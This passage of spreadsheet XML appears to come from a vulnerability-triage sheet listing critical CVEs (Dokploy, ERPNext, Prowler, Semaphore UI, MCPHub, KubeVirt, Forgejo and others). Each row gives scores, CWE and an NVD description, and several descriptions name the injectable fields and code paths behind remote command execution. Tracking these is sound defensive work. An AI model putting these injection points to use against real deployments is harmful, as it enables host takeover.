        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72882</t>
        </is>
      </c>
      <c r="C87" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, an authenticated user who can create or update file mounts for a service can inject shell metacharacters into filePath, causing Dokploy to execute attacker-controlled commands on the configured remote managed server over SSH. In the default deployment model, this yields direct remote host RCE from the web interface.</t>
        </is>
      </c>
      <c r="M87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72882</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72886</t>
        </is>
      </c>
      <c r="C88" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.29.2 until 0.29.13, schedule.create and schedule.update in apps/dokploy/server/api/routers/schedule.ts derive serviceId from applicationId or composeId and execute the owner/admin host-schedule gate only in the alternative branch, allowing a member with access to one application to attach its applicationId to a dokploy-server schedule and run a supplied script as root through schedule.runManually. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72886</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72901</t>
        </is>
      </c>
      <c r="C89" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G89" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated low-privilege member to execute arbitrary commands on the control-plane host because the volumeName field accepted by volumeBackup.create and volumeBackup.runManually is interpolated without quoting in packages/server/src/utils/volume-backups/backup.ts and executed through child_process.exec, with Docker socket access making execution host/root-equivalent. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72901</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72902</t>
        </is>
      </c>
      <c r="C90" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G90" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated user to execute arbitrary commands on a local or SSH-connected target server because registry.testRegistry and registry.testRegistryById in apps/dokploy/server/api/routers/registry.ts interpolate the password field into an execAsyncRemote shell command instead of using safeDockerLoginCommand. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72902</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72911</t>
        </is>
      </c>
      <c r="C91" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.118.0 and 16.29.0, the validate_template and render_template calls in erpnext/accounts/doctype/process_statement_of_accounts/process_statement_of_accounts.py render subject, body, and pdf_name fields with unrestricted globals including frappe.utils, allowing an authenticated user with a common operational role to inject template expressions, execute arbitrary server-side code, and read data across the application. This issue is fixed in versions 15.118.0 and 16.29.0.</t>
        </is>
      </c>
      <c r="M91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72911</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73263</t>
        </is>
      </c>
      <c r="C92" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G92" s="5" t="inlineStr">
        <is>
          <t>kubernetes, python</t>
        </is>
      </c>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.36.0, the Kubernetes provider connection test accepted kubeconfig_content containing a legacy gcp auth-provider with config.cmd-path and config.cmd-args because kubeconfig_contains_exec_auth in api/src/backend/api/v1/serializers.py checked only exec blocks, and POST /api/v1/providers/{id}/connection loaded it through config.load_kube_config_from_dict in prowler/providers/kubernetes/kubernetes_provider.py, causing kubernetes-python CommandTokenSource.token to run the attacker-supplied command through subprocess.Popen on the shared worker. This issue is fixed in version 5.36.0.</t>
        </is>
      </c>
      <c r="M92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73263</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73268</t>
        </is>
      </c>
      <c r="C93" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-curator-controller component of multicluster engine (MCE). A tenant with create or update permissions on ClusterCurator resources can inject an arbitrary Job specification. This is possible because the CreateJob() function does not validate user-controlled input when unmarshaling the spec.install.overrideJob raw extension. Successful exploitation allows the injected Job to run with the controller's elevated privileges, leading to arbitrary code execution and privilege escalation, potentially accessing cluster-wide secrets.</t>
        </is>
      </c>
      <c r="M93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73268</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73269</t>
        </is>
      </c>
      <c r="C94" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-curator-controller component. A local user, by creating a ClusterCurator resource with a specific naming convention, can trigger the creation of a cluster-scoped ClusterRoleBinding. This allows the user to escalate their privileges from namespace-local access to cluster-wide control. This privilege escalation grants broad permissions, including the ability to access and manipulate secrets, manage cluster actions, and delete hosted clusters or node pools.</t>
        </is>
      </c>
      <c r="M94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73269</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73294</t>
        </is>
      </c>
      <c r="C95" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools. Prior to 2.18.17 and 2.19.5-beta2, repository git_url handling passes an attacker-controlled --upload-pack option to CmdGitClient.GetLastRemoteCommitHash through POST /api/project/{id}/repositories and scheduled commit-hash polling, allowing a project Manager or Owner to execute arbitrary OS commands in the Semaphore server process. This issue is fixed in versions 2.18.17 and 2.19.5-beta2.</t>
        </is>
      </c>
      <c r="M95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7374</t>
        </is>
      </c>
      <c r="C96" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr">
        <is>
          <t>2026-05-26</t>
        </is>
      </c>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's virt-handler component. This vulnerability allows an authenticated OpenShift user with edit permissions in a single namespace to exploit improper symlink validation when connecting to virtual machine console sockets. By replacing the console socket with a symlink to the host's container runtime (CRI-O) socket, an attacker can hijack virt-handler's privileged connection. This enables the attacker to access any Unix socket on the host, potentially leading to full control of the node and the entire cluster.</t>
        </is>
      </c>
      <c r="M96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7374</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78234</t>
        </is>
      </c>
      <c r="C97" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t>
        </is>
      </c>
      <c r="M97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79748</t>
        </is>
      </c>
      <c r="C98" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G98" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.15, the POST /api/servers and PUT /api/servers/:name endpoints in MCPHub create/update MCP server configurations and then immediately spawn the configured stdio process via child_process.spawn. Authentication is required, but there is no authorization check restricting these endpoints to admins, and there is no allowlist/sanitization on the command and args fields. As a result, any authenticated non-admin user can submit a server configuration with command:"/bin/sh" (or any other binary) and arbitrary args, causing MCPHub to execute the attacker-controlled process as the MCPHub server's OS user (commonly root in the published Docker image and in npx/systemd deployments). This issue has been patched in version 0.12.15.</t>
        </is>
      </c>
      <c r="M98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="C99" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="C100" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="M100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="C101" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G101" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql</t>
        </is>
      </c>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr">
        <is>
          <t>In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services.
The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments.
An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components.
The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation.</t>
        </is>
      </c>
      <c r="M101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89094</t>
        </is>
      </c>
      <c r="C102" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="inlineStr"/>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr">
        <is>
          <t>Forgejo before 16.0.4 allows remote code execution via a crafted template repository because template expansion on files in .forgejo/template is mishandled.</t>
        </is>
      </c>
      <c r="M102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89094</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-43716</t>
        </is>
      </c>
      <c r="C103" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L103" s="5" t="inlineStr">
        <is>
          <t>Verification Bypass vulnerability exists in EPSON 150075647YWWV110 EasyMP Network Updater Ver.1.20. The Epson projector can be updated by encrypted firmware through USB.</t>
        </is>
      </c>
      <c r="M103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-43716</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-43717</t>
        </is>
      </c>
      <c r="C104" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr">
        <is>
          <t>An issue exists in pson EH-TW5350 Epson iProjection.apk v3.2.6. If you identify a projector equipped with an iProjection function, you can access the projector using hard-coded authentication information and control the projector maliciously.</t>
        </is>
      </c>
      <c r="M104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-43717</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-42179</t>
        </is>
      </c>
      <c r="C105" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr">
        <is>
          <t>Bird Home Automation GmbH D1101V-F 000140 is vulnerable to Incorrect Access Control via the Key derivation process, password validation process.</t>
        </is>
      </c>
      <c r="M105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-42179</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11080</t>
        </is>
      </c>
      <c r="C106" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr">
        <is>
          <t>The Post Grid and Gutenberg Blocks – ComboBlocks plugin for WordPress is vulnerable to Unauthenticated Hook Injection in versions 2.2.32 to 2.3.1 via several functions in the ~/includes/blocks/form-wrap/function.php file. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress, granted no other security controls are present in the function.</t>
        </is>
      </c>
      <c r="M106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11080</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-22373</t>
        </is>
      </c>
      <c r="C107" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr">
        <is>
          <t>fedoraproject:fedora, malaterre:grassroots_dicom</t>
        </is>
      </c>
      <c r="I107" s="5" t="inlineStr">
        <is>
          <t>2024-04-25</t>
        </is>
      </c>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in the JPEG2000Codec::DecodeByStreamsCommon functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted DICOM file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</t>
        </is>
      </c>
      <c r="M107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-22373</t>
        </is>
      </c>
    </row>
    <row r="108">
